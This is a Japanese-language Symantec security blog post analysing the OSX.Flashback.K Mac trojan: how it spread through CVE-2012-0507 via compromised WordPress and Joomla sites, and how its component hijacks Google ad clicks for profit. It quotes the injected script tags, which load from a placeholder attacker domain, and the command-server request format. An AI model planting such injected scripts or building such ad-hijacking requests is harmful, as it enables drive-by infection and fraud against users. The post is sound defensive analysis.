Video Screencast Help

OSX.Flashback.K の背後にある金銭的な動機

Created: 01 May 2012 07:04:35 GMT • Translations available: English
Symantec Security Response's picture
0 0 Votes
Login to vote

シマンテックは、OSX.Flashback.K の背後にある動機を突きとめるべく、OSX.Flashback.K の各種コンポーネントのリバースエンジニアリングに注力してきました。Mac を狙うこのトロイの木馬を、さらに詳しく見てみることにしましょう。

感染
すでに広く知られているとおり、OSX.Flashback.K の最新の亜種は Oracle Java SE のリモートランタイム環境に存在するサービス拒否の脆弱性(CVE-2012-0507)を利用して拡散されていました。Oracle からのパッチは 2 月に公開されましたが、Mac ユーザーにとって残念なことに、この脆弱性に対する Apple のパッチ公開は 6 週間も後になってしまったため、その間セキュリティ上大きな穴が残ることになりました。

その隙を狙って、Flashback Trojan は大量の Mac コンピュータに感染を広げたのです。Flashback の作成者は、Oracle のパッチ公開から Apple のパッチ公開までに生じた時間差につけ込み、Wordpress と Joomla を使う脆弱な Web サイトを悪用して以下のような悪質なコードスニペットを追加しました。

<script src="[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1"></script>
<script src="[ATTACKER_DOMAIN].rr.nu/nl.php?p=d"></script>

パッチを適用していない Mac から、感染したサイトにアクセスすると、OSX.Flashback.K がインストールされます。Flashback による感染を段階順に細かく記すと以下のようになります。

  1. 感染した Web サイトにユーザーがアクセスする。
  2. さまざまな Java 悪用コードがホストされている悪用サイトにブラウザがリダイレクトされる。
  3. CVE-2012-0507 を利用して、最初の OSX.Flashback.K コンポーネントの復号とインストールが行われる。
  4. このコンポーネントが、ローダーと広告クリック処理コンポーネントをダウンロードする。

広告クリック処理コンポーネントについては詳しいことが判明していないので、ここでは、このマルウェアの背後にある動機を明らかにしようと思います。このトロイの木馬の最終目的は金儲けにあります。

広告クリック処理コンポーネント
Flashback の広告クリック処理コンポーネントは、Chrome、Firefox、Safari にロードされ、ブラウザからの GET 要求と POST 要求をすべて傍受する機能を備えています。Flashback は Google に対する検索クエリーを標的にし、検索クエリーによっては攻撃者が選んだ他のページにユーザーをリダイレクトして、そのページからクリック報酬を受け取ります(本来の広告クリックは Google に届かなくなります)。

広告クリック処理コンポーネントは、Google 検索上で広告クリックから生成される要求を解析し、それがホワイトリストにあるかどうかを照合します。ホワイトリストになければ、その要求を次の形式で悪質なサーバーに転送します。

http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]

この要求で Flashback は特別に細工されたユーザーエージェントを使いますが、実際にはこれは base64 でエンコードされたクライアント汎用一意識別子(UUID)です。ユーザーエージェントはすでに "ua" というクエリー文字列パラメータで送信されているので、これは未知の何者かが認識されないユーザーエージェントを使って URL を調査することを妨害する試みと思われます。

応答を RC4 で復号し、base64 でデコードすると次のような内容であることがわかります。

ここでは、「toys」という語の検索に基づいて広告クリックが乗っ取られています。BIDOK は、Flashback が応答で受信することを想定している 5 種類以上あるコマンドのひとつですが、広告クリック処理コンポーネントに関しては、これこそシマンテックが注目しているコマンドです。

赤枠で示すように、リダイレクト URL と、クリックに対する報酬が 0.8 セントであることがはっきり判読できます。リダイレクト URL はこの後でブラウザに書き込まれるので、ユーザーは新しいサイトに移動させられ、結果的に本来 Google が受信するはずだった広告クリックが乗っ取られることになります。

変更後の [REDIRECT_URL] が [http://]ecomint.com/?q=toys に等しい場合、ユーザーのブラウザに挿入される埋め込みスクリプトは、以下のようになります。

こうして最終的に Google は収益を失うことになり、Flashback の攻撃者集団に流れる金銭は膨大な額にのぼります。

広告クリック型のトロイの木馬は目新しいものではなく、昨年の 8 月に行った W32.Xpaj.B の解析でも、25,000 件の感染が観測された地域のボットネットから 1 日当たり最大 450 ドルの収益があったものと考えられています。Flashback Trojan の場合は規模が数 10 万件に達していることから、この数字は 1 日当たり優に 10,000 ドル以上に及ぶでしょう。

実に儲けの大きい犯罪と言えます。だからなおのこと、Mac をお使いの方はパッチをすべて適用し、ウイルス対策定義を最新の状態に保つことが重要です。

 

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。